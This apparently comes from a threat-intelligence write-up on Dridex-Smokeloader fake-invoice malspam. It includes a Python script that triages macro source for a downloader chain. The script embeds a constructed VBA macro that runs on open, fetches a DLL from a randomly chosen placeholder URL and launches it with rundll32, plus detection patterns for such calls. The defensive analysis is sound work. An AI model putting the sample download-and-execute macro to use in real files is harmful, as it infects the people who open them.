Two emails with different .gz attachments contain the same .chm file, which downloads and launches the malware. Stolen data is exfiltrated via the FTP server of a Bosnian company.
Technical analysis by the Malware Hunter JAMESWT
A global fake-invoice campaign delivers hybrid Dridex-Smokeloader malware. The .xlsm attachment contacts a random link from an internal list and downloads a DLL, which contains the hybrid of the banking trojan and the backdoor-loader.
A hybrid of Smokeloader and Dridex is currently being delivered through a global malspam campaign that uses fake invoices as bait. The attachment is an .xlsm file which, if opened, contacts a random link from an internal list and downloads a DLL; this in turn downloads the hybrid formed by the two families. Dridex is a dangerous banking trojan used by cybercrime groups and has long featured in campaigns worldwide, especially courier-themed ones. Its targets are mainly companies, though not exclusively. Smokeloader, by contrast, is a backdoor and loader built to download further malicious code.
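The macro stage described above (an internal list of URLs, one picked at random, a DLL downloaded and launched) is a pattern an analyst can triage quickly once the VBA source has been dumped, for instance with olevba. The script below is an added example, not JAMESWT's tooling and not the real campaign macro: the `SAMPLE_MACRO` text, its `.invalid` domains and its paths are constructed placeholders, and the helper names `triage_macro` and `verdict` are assumptions of this example.

```python
"""Triage helper for the Excel-macro downloader stage described above.

Added illustration, not the researcher's own tooling and not the actual
campaign macro: it scans VBA source text (assumed to be the output of a
macro extractor such as olevba, held in a string) for a hard-coded list of
download URLs, a random pick among them, and download-then-execute calls.
"""
import re

# Constructed sample macro, modelled on the behaviour the summary describes:
# an internal list of URLs, one chosen at random, the payload saved as a DLL
# and launched. The .invalid domains and paths are placeholders, not IoCs.
SAMPLE_MACRO = r'''
Sub Auto_Open()
    Dim urls(2) As String
    urls(0) = "http://example-one.invalid/inv/doc.dll"
    urls(1) = "http://example-two.invalid/files/a.dll"
    urls(2) = "http://example-three.invalid/x/update.dll"
    Randomize
    idx = Int(Rnd * 3)
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "GET", urls(idx), False
    http.Send
    Set stream = CreateObject("ADODB.Stream")
    stream.Write http.ResponseBody
    stream.SaveToFile Environ("TEMP") & "\stage.dll", 2
    Shell "rundll32.exe " & Environ("TEMP") & "\stage.dll,DllRegisterServer"
End Sub
'''

# Quoted http(s) string literals: candidate payload URLs.
URL_RE = re.compile(r'"(https?://[^"\s]+)"', re.IGNORECASE)
# VBA idioms that indicate one entry is picked at random from the list.
RANDOM_RE = re.compile(r'\b(Rnd|Randomize)\b', re.IGNORECASE)
# Objects and APIs commonly used by macros to fetch a file.
DOWNLOAD_RE = re.compile(
    r'(MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest|URLDownloadToFile|ADODB\.Stream)',
    re.IGNORECASE)
# Ways of launching what was fetched.
EXEC_RE = re.compile(
    r'\b(Shell|WScript\.Shell|rundll32|regsvr32|CreateObject\("Shell\.Application"\))',
    re.IGNORECASE)
# Auto-run entry points that fire when the document is opened.
AUTO_RE = re.compile(r'\b(Auto_Open|Workbook_Open|Document_Open)\b', re.IGNORECASE)


def triage_macro(src: str) -> dict:
    """Return the indicators found in `src` as a dict with stable keys."""
    urls = sorted(set(URL_RE.findall(src)))
    return {
        "urls": urls,
        # A random pick only matters when there is more than one URL to rotate.
        "random_pick": bool(RANDOM_RE.search(src)) and len(urls) > 1,
        "downloads": bool(DOWNLOAD_RE.search(src)),
        "executes": bool(EXEC_RE.search(src)),
        "auto_runs": bool(AUTO_RE.search(src)),
        "drops_dll": bool(re.search(r'\.dll\b', src, re.IGNORECASE)),
    }


def verdict(ind: dict) -> str:
    """Collapse the indicators into a triage verdict. Auto-run plus a rotating
    URL list plus download and execute is the chain the summary describes."""
    if ind["auto_runs"] and ind["downloads"] and ind["executes"] and ind["random_pick"]:
        return "downloader-with-url-rotation"
    if ind["downloads"] and ind["executes"]:
        return "downloader"
    return "no-download-chain"


if __name__ == "__main__":
    indicators = triage_macro(SAMPLE_MACRO)
    print(verdict(indicators))
    for url in indicators["urls"]:
        print("  candidate payload URL:", url)
```

Every URL in the list is worth blocking and pivoting on, not just the one a given sandbox run happened to fetch, since the macro will pick a different entry on the next detonation.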